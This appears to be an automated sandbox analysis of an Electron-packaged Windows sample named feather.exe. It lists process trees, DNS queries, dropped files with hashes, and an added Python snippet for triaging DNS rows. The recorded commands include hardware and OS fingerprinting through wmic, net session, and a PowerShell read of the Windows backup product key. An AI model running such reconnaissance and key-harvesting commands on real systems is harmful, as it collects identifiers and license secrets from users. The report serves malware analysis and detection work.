PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
PID 2692 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 3152 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2468 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 3152 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3152 wrote to memory of 2572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2468 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2468 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2572 wrote to memory of 4392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2572 wrote to memory of 4392 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 568 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 568 wrote to memory of 1676 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 568 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 568 wrote to memory of 4816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2692 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2176 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2176 wrote to memory of 2088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2176 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2176 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 2692 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2692 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe C:\Windows\system32\cmd.exe
PID 2888 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2888 wrote to memory of 4324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\feather.exe

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1660 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1660 get ExecutablePath

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1932 --field-trial-handle=1936,i,9069365023242026152,16471774539526647506,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --mojo-platform-channel-handle=2016 --field-trial-handle=1936,i,9069365023242026152,16471774539526647506,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\net.exe

net session

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1660 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1660 get ExecutablePath

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe

"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=3032 --field-trial-handle=1936,i,9069365023242026152,16471774539526647506,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

Network

Identical rows collapsed, in order of first query; Queries is the number of entries in the capture (130 in total).

Country Destination Domain Proto Queries
US 8.8.8.8:53 nova-screen-webview.com udp 8
US 8.8.8.8:53 www.google.com udp 1
US 8.8.8.8:53 dns.google udp 119
US 8.8.8.8:53 ipinfo.io udp 1
US 8.8.8.8:53 www.facebook.com udp 1
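
Reading this table: every query goes to 8.8.8.8 because that is the sandbox's configured resolver, so the destination says nothing about the sample on its own. The many dns.google lookups are consistent with Chromium's automatic DNS-over-HTTPS upgrade, which the Electron network service performs when the system resolver is Google Public DNS, and www.google.com and www.facebook.com are ordinary connectivity checks; ipinfo.io is an IP geolocation service, and nova-screen-webview.com is the only domain here that neither the runtime nor a public lookup service explains. The Python below is an added example, not part of this report: it parses rows in the format of the Network section (with or without a trailing query count), collapses repeats in first-seen order and flags rows sent to a resolver other than the expected one or naming a domain outside a known set. The rows it embeds are a constructed excerpt of the table; the expected resolver and the known-domain set are assumptions chosen for the example.

```python
"""Added example, not part of the sandbox report: parse and triage the
Network section's "Country Destination Domain Proto" rows. Sample rows are a
constructed excerpt; the expected resolver and known-domain set are assumed."""
from collections import OrderedDict

# Constructed excerpt in the report's row format.
SAMPLE_ROWS = """\
Country Destination Domain Proto
US 8.8.8.8:53 nova-screen-webview.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 nova-screen-webview.com udp
"""

# Assumptions for the example: the resolver an enterprise endpoint should use
# (queries sent elsewhere bypass internal DNS logging and filtering), and
# domains a Chromium/Electron network service contacts on its own.
EXPECTED_RESOLVERS = {"10.0.0.53"}
KNOWN_BENIGN = {"www.google.com", "www.facebook.com", "dns.google"}


def parse_rows(text):
    """Parse 'Country Destination Domain Proto [Queries]' rows. An optional
    trailing integer is treated as a pre-collapsed count for that row."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) not in (4, 5) or parts[0] == "Country":
            continue
        country, dest, domain, proto = parts[:4]
        count = int(parts[4]) if len(parts) == 5 else 1
        host, _, port = dest.rpartition(":")
        rows.append({"country": country, "resolver": host, "port": int(port),
                     "domain": domain.lower(), "proto": proto.lower(), "count": count})
    return rows


def summarize(rows):
    """Collapse identical (resolver, port, domain, proto) rows, keeping first-seen order."""
    totals = OrderedDict()
    for r in rows:
        key = (r["resolver"], r["port"], r["domain"], r["proto"])
        totals[key] = totals.get(key, 0) + r["count"]
    return [{"resolver": k[0], "port": k[1], "domain": k[2], "proto": k[3], "queries": n}
            for k, n in totals.items()]


def flag(summary, expected_resolvers=EXPECTED_RESOLVERS, known=KNOWN_BENIGN):
    """Attach review reasons to summary rows that deserve a second look."""
    findings = []
    for row in summary:
        reasons = []
        if row["resolver"] not in expected_resolvers:
            reasons.append("resolver bypass")
        if row["domain"] not in known:
            reasons.append("unknown domain")
        if reasons:
            findings.append({**row, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in flag(summarize(parse_rows(SAMPLE_ROWS))):
        print(f["queries"], f["domain"], "->", f["resolver"], ";", ", ".join(f["reasons"]))
```

With the sandbox's own resolver passed as expected_resolvers, only the unknown-domain reason survives and the output reduces to nova-screen-webview.com and ipinfo.io, which is the short list worth pivoting on from this section.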

Files

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\chrome_100_percent.pak

MD5 a0e681fdd4613e0fff6fb8bf33a00ef1
SHA1 6789bacfe0b244ab6872bd3acc1e92030276011e
SHA256 86f6b8ffa8788603a433d425a4bc3c4031e5d394762fd53257b0d4b1cfb2ffa2
SHA512 6f6a1a8bfe3d33f3fa5f6134dac7cd8c017e38e5e2a75a93a958addbb17a601c5707d99a2af67e52c0a3d5206142209703701cd3fab44e0323a4553caee86196

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\chrome_200_percent.pak

MD5 c37bd7a6b677a37313b7ecc4ff01b6f5
SHA1 79db970c44347bd3566cefb6cabd1995e8e173df
SHA256 8c1ae81d19fd6323a02eb460e075e2f25aba322bc7d46f2e6edb1c4600e6537a
SHA512 a7b07133fa05593b102a0e5e5788b29488cb74656c5ee25de897c2ba2b2a7b05c0663ade74a003f7d6df2134d0b75f0ad25e15e9c9e0969e9453b7fc40b9f8bb

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\d3dcompiler_47.dll

MD5 2191e768cc2e19009dad20dc999135a3
SHA1 f49a46ba0e954e657aaed1c9019a53d194272b6a
SHA256 7353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d
SHA512 5adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\ffmpeg.dll

MD5 208e7af956a0803900125bdc11a3ecf2
SHA1 1bd84174194485da634bf8b3af0a78e236316a8e
SHA256 d863c8a26744703f2d12c674b45c87d8b34e21efce169d4797b57964d168b077
SHA512 76937999a21391107d9ebcfd66c7a2ca967cc7cac7aeb2b15bbeca6b546423a3d5c83969ef151c95d916d5a9f653573cd59d05110566d52a5c2679059c4d4ec3

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\icudtl.dat

MD5 e0f1ad85c0933ecce2e003a2c59ae726
SHA1 a8539fc5a233558edfa264a34f7af6187c3f0d4f
SHA256 f5170aa2b388d23bebf98784dd488a9bcb741470384a6a9a8d7a2638d768defb
SHA512 714ed5ae44dfa4812081b8de42401197c235a4fa05206597f4c7b4170dd37e8360cc75d176399b735c9aec200f5b7d5c81c07b9ab58cbca8dc08861c6814fb28

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\libEGL.dll

MD5 1b74f7e2b5d44ac10a89a5cf206630a8
SHA1 dd2e816e315b6a6a271fb01dc12163d9936c77c4
SHA256 662746a02930c151c5cab2b1167a56c6ca78b44028448fda91182147856edfed
SHA512 246814e5fc157cf731e3ec3e1096922864b48a36cc5b1e5259ebd2e673fde5dc741ad600f69cd80e1544ee12438f7cc6f208add894b5e02ac5e2c87d0b3933a8

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\LICENSES.chromium.html

MD5 2675b30d524b6c79b6cee41af86fc619
SHA1 407716c1bb83c211bcb51efbbcb6bf2ef1664e5b
SHA256 6a717038f81271f62318212f00b1a2173b9cb0cc435f984710ac8355eb409081
SHA512 3214341da8bf3347a6874535bb0ff8d059ee604e779491780f2b29172f9963e23acbe3c534d888f7a3b99274f46d0628962e1e72a5d3fc6f18ca2b62343df485

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\v8_context_snapshot.bin

MD5 1a37f6614ff8799b1c063bc83c157cc3
SHA1 8238b9295e1dde9de0d6fd20578e82703131a228
SHA256 4fbe07f71b706c2a2948eba9a6b1979e23c83342b190723a6ec5251b2d6dad7c
SHA512 6677f65a0e26fdc2cff6cef0231f5e5f0713ee7c5cf7f488599a3c7ac3e8365afaec10b35d6145ea58d364151d8bcb08308765693a9797ea99b894d6e8224ac7

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\snapshot_blob.bin

MD5 6fcb8a6c21a7e76a7be2dc237b64916f
SHA1 893ef10567f7705144f407a6493a96ab341c7ccf
SHA256 2bceef4822ca7cc3add4a9dcb67c51efb51c656fce96a3b840250de15379959c
SHA512 3b745740bbbe339542ef03fd15dd631fb775e6bf8ca54d6d2b9cead3aa5aafc4cab49e507bc93641e581412bbeb916a53608d5f5d971ea453779e72d2294dafb

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\resources.pak

MD5 e2088909e43552ad3e9cce053740185d
SHA1 24b23dd4cad49340d88b9cb34e54c3ca0eb0d27f
SHA256 bba36d4d18d64d9627f54c54fd645c5ba459d25a59acc5228210bd707aef67fd
SHA512 dcefacddec38d8941c7d2d7b971b6f22dd0acb4116e48891d1d48a4d88968da12b152ccb7591715c88f8e14c315e235d1c4e6852cc38b9246091c50226900de6

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\LICENSE.electron.txt

MD5 4d42118d35941e0f664dddbd83f633c5
SHA1 2b21ec5f20fe961d15f2b58efb1368e66d202e5c
SHA256 5154e165bd6c2cc0cfbcd8916498c7abab0497923bafcd5cb07673fe8480087d
SHA512 3ffbba2e4cd689f362378f6b0f6060571f57e228d3755bdd308283be6cbbef8c2e84beb5fcf73e0c3c81cd944d01ee3fcf141733c4d8b3b0162e543e0b9f3e63

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\libGLESv2.dll

MD5 596379ba25b32e95b5ec3cd8028b291b
SHA1 af61b5d29db91997e29ffed8a410d09ce74ee51e
SHA256 d5e1d7b8531a0f4ab576ba6f78d4c63b39186a2830d313c6695f0024c9ef627a
SHA512 f8835b455820c77b4ba509c326a185bf65131242161498229c5e3584a0e7789324932b95678556a657440deaf067ead454e85bf8233efa24162e7e4d9eaf417b

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\vk_swiftshader.dll

MD5 f16c36ae369609497bfd0847889bec63
SHA1 5dca218bf0b2a20d7d027fa10fdb1b8152564fe4
SHA256 4488a958418227fbe6f64898c2f85eefd87fc9e46aea457233b38db8a86e944d
SHA512 9f06f4a318c8a3e2fdccb6d983087184cff37a2b79e0c1e85b3ac8e45695454c4aacb4468593ebbfff64739b0d598ba4d1d9dd94187b1bbd82c1369c62781109

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\vk_swiftshader_icd.json

MD5 8642dd3a87e2de6e991fae08458e302b
SHA1 9c06735c31cec00600fd763a92f8112d085bd12a
SHA256 32d83ff113fef532a9f97e0d2831f8656628ab1c99e9060f0332b1532839afd9
SHA512 f5d37d1b45b006161e4cefeebba1e33af879a3a51d16ee3ff8c3968c0c36bbafae379bf9124c13310b77774c9cbb4fa53114e83f5b48b5314132736e5bb4496f

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\vulkan-1.dll

MD5 0a8150e85160ea4311ddbd5b2d1b0b1b
SHA1 a012b8886ec9f305ff4a055ccddd5fc1f6045869
SHA256 0d56a41bead58fd5fee44b2ee60485d4c80a3a639acc42cfc57c8e059078dfe0
SHA512 d2d853d072ae7ac6871c880f164eeaa6300d9f951de3aacb4d65195407aa4a1ef18b9beae14b7eda0936e4fca5fb56b65038370d8e349893f3c8027526415921

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\af.pak

MD5 917a688d64eccf67fef5a5eb0908b6d4
SHA1 7206b01bbc3fd8cc937db9050dd8ac86cf44d8cc
SHA256 6981249837ad767fc030edc8838878a5e493fb08cc49982cffaed16cfbeb564d
SHA512 195dbec8463cf89990232296c5c927e1501f0c2e01a7be7c6a6acae651853ce1edb23d639af65979b39a3c61979119c3a305acfa3aadf0cb93e241c5e57f4534

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\am.pak

MD5 3cfd7c5bb92ab72c63e003208a9e4529
SHA1 165d2f69ab6a6e237f0fec943b5577123cefea87
SHA256 12e9e1bec1c46e5ea706157726e17a4429acf288a5754fa183bd9b4cf7d3853b
SHA512 cd7c7837d758ea66abc871503cda6fe99ff45990405e60c1133e7c1f4cb29ee69723c9558bb2d3eccb42948da57351f4f095062616686ab2e255acd3c86236f0

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\ar.pak

MD5 3c2ab7363018db1f20b90acbc305cb4c
SHA1 60b9cf453178ad0e60faf20d137a0c7eabde65c9
SHA256 3ca47b9c436723f837a53b2904b51efdf13ab6cad2f3ef4fe48a1115847eccbf
SHA512 589beb3e95e93f30341933c9b9826210e6bf3e9c1ad8f113d9d8a98fa5a526f81e454ee3357fb55d60d67a4890ce33e964ba2fa810e1771a6b7e82746492313a

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\bg.pak

MD5 a69f6075863d47b564a2feb655a2946f
SHA1 062232499ff73d39724c05c0df121ecd252b8a31
SHA256 a5eb7038ed956bad7704a722f05691474ff709dffbad92b8e31dbb869ad58334
SHA512 930ce3938aa02a8bcc609a64bd86b7e6164d63baad157a980fd079859a6bee5db87bd1f7a74a71108f8368bc9c6154bf14a2dba1abf269f572bc262614bcf1db

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\bn.pak

MD5 d43ce80ddca3fab513431fa29be2e60a
SHA1 3e82282e4acfec5f0aca4672161d2f976f284a0c
SHA256 87670ff2ceb1ebc38fce2c3b745ac965f3de5de3133d99ed33933a8f3e99d874
SHA512 1d33ca9bacb91ef328f89a14777a704000bf30fe59aa1cbbbff34d8bad266c98d78c9e411e289e834e76eb721dd98934426a565cd5b3436d5a103abe37f7612a

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\ca.pak

MD5 2d30c5a004715bc8cd54c2e21c5f7953
SHA1 fed917145a03d037a32abac6edc48c76a4035993
SHA256 d9c45d55a9a5661063b9bbebb0615de8f567f3925d04fd10938da9617c6220e0
SHA512 b3803551f53d290d8839789f829afc9c1e12052c81ba20d5e01fb3d2bacd5d1e97bd4c05074322eed17fdec04c9176c655076faec8a3aef17c39fb999e0c1fcf

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\cs.pak

MD5 06e3fe72fdc73291e8cf6a44eb68b086
SHA1 0bb3b3cf839575b2794d7d781a763751fe70d126
SHA256 397134d1834f395f1c467a75d84ef2e8545cb0f81e94dbe78b841fbbdaad802d
SHA512 211594c30ad4f5ca8813596b59751168c60dfa0d13f24f2aa608fce82d21c2de3de69fe007c4bde1602da8aa7ea81ec0f15e173abc1224362c36b493b425b425

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\da.pak

MD5 1939faa4f66e903eac58f2564eeb910e
SHA1 bace65ee6c278d01ccf936e227e403c4dff2682d
SHA256 0b9da7bd6531a7ebe7d8188b320c0953adcfbaf654037f8265261a12e63d3c87
SHA512 51588d2fe724e6c407724ea6f46883ded39397af744effaf672f75952a6a734e61e93e59f446080317f2a2b3fa1b45e7405f90fe0b226c44c9f3dd9a4e130a87

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\de.pak

MD5 2163820cd081fdd711b9230dc9284297
SHA1 c76cc7b440156e3a59caa17c704d9d327f9f1886
SHA256 6d787033c94755cc80c187ed8a9de65808bb4d7968354bbb94b7868ac2e8d205
SHA512 920fa2a10f7aa7f1f6d911fe2a77eded0384617d8fd863943afd99a584dab3fb2ea3e5d2e20bca529689a99fdf303912007f2918c62482d8a90194a810f6e535

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\fa.pak

MD5 c770cfb9fbabda049eb2d87275071b54
SHA1 20e41b1802c82d15d41fadaf3dcd049b57891131
SHA256 dae7e7c87026cd4e8a4cd813cc71def32c86ed47865ce6da5383b66b7021c5bc
SHA512 cda117a60c853f12ade579c34fce22d992b33df1f5001a237767b6e642d5c775c3387bcee05d6557fe5a2f6235f93258954a697d3b9812d2550c4801869f4751

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\et.pak

MD5 82a07b154cb241a2ebe83b0d919c89e9
SHA1 f7ece3a3da2dfb8886e334419e438681bfce36cf
SHA256 84866ccaf2ec39486f78e22886bef3fe75c1eb36e7a7c071471040e12018db28
SHA512 07319d155bdf9e27762ecb9ef6871430bef88b1af129450eb65aa798ebaa4e02b25b0cf9bde3b12ff1b04a3d14241569b73d6af895d2e85dd7b24d393e7317e9

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\es.pak

MD5 a24e01a4947d22ce1a6aca34b6f2a649
SHA1 750c2550465c7d0d7d1d63ad045b811b4a26dc55
SHA256 848d422be1b8fae74786ed6d6dfa7dd2e97b798b4a9ba1d929085e425b2a54e0
SHA512 02fc4ce96aa523ebc204243bbec3347b09cb20bcc0ba66cf9532a6fb26c48f7f2396bbb833f1916f8f081ffc9c6cd2de07315e66c5115042a0b44270fa4468c1

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\es-419.pak

MD5 6f4613a4a88af6c8bd4ef39edeee3747
SHA1 c8850a276d390df234258d8de8c6df79240c8669
SHA256 8f7b8776e61e3ed5aa33b1a571ac834653b54b12a499d956b95d567b7e1ba987
SHA512 e5933dcb2aaaa2018ba8b13f4af3dc8a950640ac60acb1b56ad6de24541701d0ffc1f4cb28c7932af924bfd673edcee20bf649156ab95ea9499ec43c703ea141

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\en-US.pak

MD5 626f30cfd9ad7b7c628c6a859e4013bd
SHA1 02e9a759c745a984b5f39223fab5be9b5ec3d5a7
SHA256 0fd74bb69ad35b3f9391fa760bf0eb0ee73d2bea0066244577ef2abd269513de
SHA512 9ce902f21fef70c5b5af444b532b36c9a00d896878cb4021c9b1dc07aa3277d956bca65ee0adb68467eec113e535b60a8a5fb5414c7d0ca761ceae5c43b7d9a9

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\en-GB.pak

MD5 9d9121bdc9af59b5899ce3c5927b55d8
SHA1 568626a374cd30237c55b72c74b708da8d065ec1
SHA256 f4d45ccc89834376f35d4d83fe5b2d5112b8cc315fcb03228720749aae31c805
SHA512 149a8acf256dc12f62706f72ad8ec88cbfdf7f8dc874bcd9facf484cdb00e7c5787f5e1bbc12b5bbe1b19b6524e7e8a1c7dba2838abeb9aafa3ce89795fd22ae

C:\Users\Admin\AppData\Local\Temp\nsl56AC.tmp\7z-out\locales\el.pak

MD5 a14d8a4499a8b2f2f5908d93e2065bf7
SHA1 1473a352832d9a71c97a003127e3e78613c72a17
